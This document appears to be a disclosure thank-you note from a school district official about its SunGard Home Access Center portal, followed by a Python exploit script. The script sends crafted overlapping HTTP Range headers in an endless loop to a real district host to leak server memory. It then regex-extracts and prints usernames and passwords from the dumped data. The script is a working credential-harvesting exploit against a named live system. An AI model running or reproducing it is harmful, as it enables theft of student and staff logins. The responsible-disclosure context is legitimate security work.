The information you sent was amazing. I think you definitely have a future in computers.
I am sharing your information with the manufacture of the Home Access Center (HAC), SunGard.
I will share their findings with you as well.
Thank you again for your honorable and ethical approach to an issue.
Regards.
| import requests, re | |
| # Create Overflowable Payload | |
| lots_of_numbers = [1000000,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,5,5,5,5,5,5,5,5,5,5,5,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,2557906952,2557906952,2557906952,2557906952,2557906952,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25] | |
| payload = ",".join(map(lambda n: str(n) + "-18446744073709551615", lots_of_numbers)) | |
| # Parse System Memory | |
| creds = re.compile(r'LogOnDetails.UserName=.+&LogOnDetails.Password=.{0,15}') | |
| while True: | |
| # Send Payload and Get Dumped Data | |
| data_dump = requests.get("https://home-access.cfisd.net/welcome.png", headers={"Range": "bytes=" + payload}).text.encode('ascii','ignore') | |
| # Search | |
| for cred in creds.findall(data_dump): | |
| print(cred.replace("LogOnDetails.UserName=","Username: ").replace("&LogOnDetails.Password="," Password: ")) |
pp